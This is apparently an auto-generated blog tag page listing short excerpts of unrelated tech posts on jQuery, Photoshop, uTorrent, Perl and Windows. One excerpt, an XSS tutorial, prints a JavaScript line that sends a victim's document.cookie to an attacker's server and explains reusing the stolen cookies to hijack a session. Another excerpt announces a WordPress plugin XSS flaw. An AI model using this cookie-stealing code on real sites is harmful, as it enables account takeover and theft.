03 Jan, 2011

Jquery file upload plugin

Articles related to jquery file upload plugin

JQuery make dynamic draggable and droppable containers

http://digitalpbk.com/jquery/drag-drop-make-dynamic-draggable-and-droppable-containers } }); jQuery Drag Code using jQuery Draggable $(".drag").draggable({ helper: 'clone', opacity: 0.7, revert: 'invalid' }); If you clone the dragagble or droppable object, via $(this).clone(), the New cloned object that is created is not draggable or droppable. In order to make the new object draggable and droppable, we have to use a plugin called livequery. When you clone an object jQuery doesn't clone its internal events and functions ...
Published 1 year, 11 months ago

Photoshop Resize Batch images in a directory

http://digitalpbk.com/photoshop/photoshop-resize-batch-images-directory Photoshop Resize Batch images in a directory Photoshop Resize Batch images in a directory Nowadays most camera's produce so big photos like you could make a big banner with those. Inorder to upload photos to web to photo sharing services like Flickr or Picasa, or Social Networking sites such as Orkut and Facebook, we should reduce the image resolution ie (Width & Height) scale down the image so that it can be uploaded quick and easily. For those who have photoshop CS3 installed, there is a quick and easy way to scale the images ...
Published 2 years, 3 months ago

Optimize Javascript files with Google Closure compiler

http://digitalpbk.com/javascript/optmizie-javascript-files-google-closure-compiler Optimize Javascript files with Google Closure compiler Optimize Javascript files with Google Closure compiler Google has released / open sourced one of its internal tools, the javascript closure compiler. The closure compiler is used to optimize javascript files. It works by analyzing the code and removing redundancies and shortening variable names. This tool can be used to compress javascript files, (similar to the famous packer), results in lesser code to download, execute, obfuscation and faster user experience. Since most web 2.0 or 3 ...
Published 2 years, 3 months ago

Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability

http://digitalpbk.blogspot.com/2009/07/wordpress-nextgen-gallery-xss.html Wordpress nextGEN gallery XSS (Cross site scripting) Cookie Stealing Vulnerability IntroNow I need not tell what actually an XSS is, for that refer to here. To see what I mean check out the links given below. If you are using NextGen wordpress plugin, you are probably infected.the VulnerabilityThe vulnerability on this wordpress plugin is seen in the pid, album, gallery GET variables. http://www.example.com/wordpress/next-gen-gallery/?album=1&pid=3&gallery=2The GET variables on most ...
Published 2 years, 6 months ago

uTorrent 2.2 uTP means slower downloads

http://digitalpbk.com/utorrent/utorrent-22-utp-slow-downloads-disable uTorrent 2.2 uTP means slower downloads , torrent downloads would consume the entire bandwidth when used in a network, giving other users no or little bandwidth. uTP protocol works based on network delays and dynamic packet size to determine if it is consuming the entire bandwidth in a network, and accordingly uTorrent slows the download. uTP Good or Bad? uTP is good for co network users as one does not eat up the entire bandwidth, but it means slower uTorrent downloads, slower uploads which again makes slower downloads. In overall u ...
Published 1 year, 1 month ago

XSS - Part 2 (Cookie stealing and Defacement)

http://digitalpbk.blogspot.com/2006/12/xss-part-2-cookie-stealing-and.html ();i.src = "http://myserver.com/myfolders/grabcookie.php?cookie="+document.cookie;This code will send the cookies to your server. Now embeding the script in url can be done as discussed in part 1.Next all you have to do is get this cookie (from cookiejar.txt) and set them in your browser. You can add and edit cookies in firefox with the cookie editor plugin.Just a refresh will certainly get you in, if you are not too late (Cookie expires after sometime).Defacing a websiteTo deface a website , the site must have a system which puts something you submit on their site (like ...
Published 5 years, 1 month ago

Making Sony Ericsson Mobile Themes

http://digitalpbk.blogspot.com/2007/04/making-sony-ericsson-mobile-themes.html Making Sony Ericsson Mobile Themes IntroSony Ericsson mobile themes (.thm files) is simply a collection of a lot of images and an xml file that specifies the colour codes. Take a theme file rename it to .tar (use archive manager on linux or any standard compresssing utility) and unzip it using any standard unzipping utility. Just play with the files and images and you can make your self a new theme. Be it for W550i, W800i, W880i, K310i, K750i, K700i, etc ... Re-zip the contents and rename ...
Published 4 years, 10 months ago

Perl script to remove a directory and contents recursively

http://digitalpbk.com/perl/perl-script-remove-directory-and-contents-recursively # or deldir($ARGV[0]) to make it commandline sub deldir { my $dirtodel = pop; my $sep = '/'; opendir(DIR, $dirtodel); my @files = readdir(DIR); closedir(DIR); @files = grep { !/^\.{1,2}/ } @files; @files = map { $_ = "$dirtodel$sep$_"} @files; @files = map { (-d $_)?deldir($_):unlink($_) } @files; rmdir($dirtodel); } The deldir sub routine recursively iterates and deletes all the files and directories. PERL How to ...
Published 2 years, 2 months ago

Permission Denied on Hosts File (Windows 7)

http://digitalpbk.com/windows/host-file-windows-7-write-permission-denied Permission Denied on Hosts File (Windows 7) On Windows 7, I was trying to edit the host file using Komodo and was getting Permission Denied, and tried notepad too still got permission denied. I thought initially it was McAfee Anti Virus that was disabling the edit of host file as this file is an important system configuration file. The reason but was that Windows requires the editor to run with administrator privileges to edit the file, this is different in Windows XP because all programs ...
Published 1 year, 11 months ago

CHM Files Navigation to the webpage was cancelled

http://digitalpbk.com/windows-chm/chm-files-navigation-webpage-was-cancelled CHM Files Navigation to the webpage was cancelled CHM Files Navigation to the webpage was cancelled Does this window appear when you open CHM files ? This happend to me after upgrading to Internet Exporer 7. If you are wondering why you cant read the CHM files, just do the steps below : Steps for solving Navigation to the webpage was cancelled Close the CHM fileOpen it again and you will get the same popup as shown below Uncheck the checkboxAlways ask before opening this file (Highlighted in the image above). Press Open Now ...
Published 2 years, 2 months ago

Related help topics for jquery file upload plugin More keywords like jquery file upload plugin
More pages for jquery file upload plugin


Email Newsletter
Email:
Popular Posts
Recent Posts
Tags
Random photo
Like a batman guarding his boat @ Elephant Beach Havelock Like a batman guarding his boat @ Elephant Beach Havelock in Havelock Island Andaman
On Facebook
Recent Comments


digitalpbk